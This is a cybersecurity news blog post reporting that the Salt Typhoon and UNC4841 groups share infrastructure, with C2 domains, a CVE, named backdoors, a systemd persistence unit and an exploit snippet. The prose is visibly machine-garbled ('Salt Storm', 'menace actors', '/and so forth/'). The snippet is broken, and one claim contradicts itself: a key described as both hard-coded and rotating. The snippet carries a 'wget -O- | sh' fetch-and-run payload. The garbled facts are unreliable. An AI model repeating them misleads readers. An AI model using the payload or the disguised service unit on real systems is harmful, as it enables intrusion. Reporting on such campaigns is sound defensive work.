Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Chinese Salt Typhoon and UNC4841 Hackers Teamed Up to Attack Government and Corporate Infrastructure

Chinese Salt Typhoon and UNC4841 Hackers Teamed Up to Attack Government and Corporate Infrastructure

Posted on September 9, 2025September 9, 2025 By CWS

Cybersecurity researchers started monitoring a complicated marketing campaign within the closing months of 2024, concentrating on each authorities and company networks throughout a number of continents.

The menace actors behind this operation, recognized colloquially as Salt Storm and UNC4841, leveraged overlapping infrastructure and shared ways to maximise stealth and persistence.

Preliminary infiltration was achieved by way of exploitation of unpatched distant code execution vulnerabilities in public-facing servers, adopted by the deployment of bespoke backdoors.

Affected organizations reported anomalous DNS queries and unexplained outbound HTTPS visitors to domains resembling pulseathermakf[.]com and infraredsen[.]com, which have been later attributed to Salt Storm’s command-and-control (C2) community.

Silent Push analysts famous that the adversaries’ an infection vector usually started with exploitation of a zero-day flaw in enterprise e mail gateways.

In a single documented incident, UNC4841 exploited CVE-2023-2868 within the Barracuda E-mail Safety Gateway Equipment to determine preliminary entry.

Outcomes from checking WHOIS information for the UNC4841 area (Supply – Silent Push)

Put up-exploitation, the attackers uploaded a personalized rootkit named Demodex, which facilitated kernel-level persistence and evasion of host-based detection mechanisms.

Round this identical time, Salt Storm deployed two further backdoors—Snappybee and Ghostspider—every designed to mix into legit visitors patterns by speaking over normal ports and utilizing randomized HTTP headers to keep away from signature-based detection.

Silent Push researchers recognized the convergence of those two teams when area registration information revealed shared e mail registrants and SOA mbox entries tied to gibberish ProtonMail addresses.

This infrastructure overlap instructed a coordinated effort or useful resource sharing between the 2 APT clusters.

By correlating WHOIS knowledge with DNS A-record lookups, analysts uncovered over 45 beforehand unreported domains related to each menace actors, increasing the recognized indicator set for proactive protection measures.

An infection and Persistence Mechanisms

The an infection chain begins with a crafted HTTP request exploiting weak software program modules. A proof-of-concept snippet supplied by Silent Push illustrates the exploit’s supply payload:-

import requests

exploit_url = ”
payload = “wget -O- | sh”
response = requests. Get(exploit_url + payload)
print(“Exploit delivered, standing:”, response.status_code)

Upon profitable exploitation, the Ghostspider backdoor script installs as a system service beneath a randomized identify.

The service unit file, found on compromised hosts, resembles:-

[Unit]
Description=NetworkManager Service
After=community.goal

[Service]
Sort=easy
ExecStart=/usr/bin/ghostspider –config /and so forth/ghostspider.conf

[Install]
WantedBy=multi-user.goal

This method ensures automated execution on boot, whereas /and so forth/ghostspider.conf incorporates encrypted C2 endpoints and sleep timers to throttle community beacons.

To additional evade detection, the attackers carried out a dual-layer persistence tactic: first through the service unit after which by way of a cron job that screens and restarts the backdoor if terminated.

Silent Push analysts extracted the decryption routine from reminiscence, revealing a light-weight XOR cipher utilized to each configuration information and community visitors payloads.

The cipher key, 0x4F, is hard-coded however dynamically rotated each 120 hours, stopping easy static evaluation.

The seamless integration of those an infection and persistence ways underscores the superior capabilities of Salt Storm and UNC4841.

Organizations are urged to audit DNS and WHOIS telemetry for recognized malicious domains and deploy behavior-based detection to establish anomalous course of launches and encrypted C2 visitors.

Enhance your SOC and assist your crew shield your online business with free top-notch menace intelligence: Request TI Lookup Premium Trial.

Cyber Security News Tags:Attack, Chinese, Corporate, Government, Hackers, Infrastructure, Salt, Teamed, Typhoon, UNC4841

Post navigation

Previous Post: [Webinar] Shadow AI Agents Multiply Fast — Learn How to Detect and Control Them
Next Post: 160,000 Impacted by Wayne Memorial Hospital Data Breach

Related Posts

Global Powers Intensify Cyber Warfare with Covert Digital Strikes on Critical Systems Global Powers Intensify Cyber Warfare with Covert Digital Strikes on Critical Systems Cyber Security News
Agenda Ransomware Actors Deploying Linux RAT on Windows Systems Targeting VMware Deployments Agenda Ransomware Actors Deploying Linux RAT on Windows Systems Targeting VMware Deployments Cyber Security News
PoC Exploit Released for Use-After-Free Vulnerability in Linux Kernel’s POSIX CPU Timers Implementation PoC Exploit Released for Use-After-Free Vulnerability in Linux Kernel’s POSIX CPU Timers Implementation Cyber Security News
New Botnet Loader-as-a-Service Exploiting Routers and IoT Devices to Deploy Mirai Payloads New Botnet Loader-as-a-Service Exploiting Routers and IoT Devices to Deploy Mirai Payloads Cyber Security News
Windows 11 25H2 Update Preview Released, What’s New? Windows 11 25H2 Update Preview Released, What’s New? Cyber Security News
Aembit Reveals NHIcon 2026 Agenda & Speakers Aembit Reveals NHIcon 2026 Agenda & Speakers Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • FBI Verifies Email Breach as US Offers Reward for Hackers
  • Critical F5 BIG-IP Vulnerability Now Actively Exploited
  • China-Linked Cyber Threats Target Southeast Asian Government
  • AI-Powered VoidLink Malware Framework Poses New Cyber Threat
  • Top Log Monitoring Tools to Watch in 2026

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • FBI Verifies Email Breach as US Offers Reward for Hackers
  • Critical F5 BIG-IP Vulnerability Now Actively Exploited
  • China-Linked Cyber Threats Target Southeast Asian Government
  • AI-Powered VoidLink Malware Framework Poses New Cyber Threat
  • Top Log Monitoring Tools to Watch in 2026

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark